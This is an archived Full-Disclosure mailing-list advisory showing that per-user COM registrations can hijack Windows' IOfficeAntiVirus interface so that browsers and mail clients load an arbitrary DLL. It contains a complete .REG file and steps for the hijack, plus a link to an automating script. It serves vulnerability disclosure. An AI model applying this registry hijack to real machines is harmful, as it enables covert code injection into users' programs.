| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 28 Mar 2020 01:07:04 +0100
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <fulldisclosure@...lists.org>
Cc: bugtraq@...urityfocus.com
Subject: [FD] Defense in depth -- the Microsoft way (part 66): attachment
manager allows to load arbitrary DLLs
Hi @ll,
this is the continuation of the previous posts
<https://seclists.org/fulldisclosure/2020/Mar/45> and
<https://seclists.org/fulldisclosure/2020/Mar/48>.
(Un)fortunately the IOfficeAntiVirus interface (see
<https://support.microsoft.com/en-us/help/914922/microsoft-windows-defender-helps-provide-real-time-protection>)
has at least another weakness which also allows (unprivileged users) to
load arbitrary DLLs into web browsers, mail/news clients, instant
messengers, file explorer and every other program which calls this COM
interface.
With Windows 2000, Microsoft introduced the "merged view" of the
[HKEY_CLASSES_ROOT] virtual registry tree: see
<https://msdn.microsoft.com/en-us/library/ms724498.aspx>
"Thanks" to this feature, COM categories/classes/interfaces registered
by (unprivileged) users below [HKEY_CURRENT_USER\Software\Classes]
obscure the corresponding COM categories/classes/interfaces registered
(by administrators) below [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]
Demonstration:
~~~~~~~~~~~~~~
On a 32-bit installation of Windows XP SP2 or any newer version of
Windows perform the following steps (adaption for 64-bit installations
is left as an exercise to the reader):
1. Log on to an arbitrary (unprivileged) user account.
2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
and save it in an arbitrary directory.
3. Create a text file SENTINEL.REG with the following contents:
--- SENTINEL.REG ---
REGEDIT4
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented
Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
@="<path>\\SENTINEL.DLL" ; replace <path> with the directory used in step 2.
"ThreadingModel"="Both"
; NOTE: the following entries are optional!
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{56FFCC31-D398-11D0-B2AE-00A0C908FA49}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
@="{00000000-0000-0000-C000-000000000046}" ; IUnknown
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
@="4"
--- EOF ---
4. Double-click the file SENTINEL.REG to merge it into the user's
registry.
5. Download an arbitrary file with your web browser, for example
<https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>,
or save an attachment in your mail client, and notice the
message boxes displayed from the sentinels.
NOTE: the batch script
<https://skanthak.homepage.t-online.de/download/MSOAV.CMD>
performs all these steps on 32-bit and 64-bit installations
of Windows XP and newer versions of Windows.
Mitigation:
~~~~~~~~~~~
Use AppLocker or SAFER alias Software Restriction Policies: see
<https://skanthak.homepage.t-online.de/SAFER.html>
stay tuned, and NEVER use Windows without SAFER or AppLocker
Stefan Kanthak
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists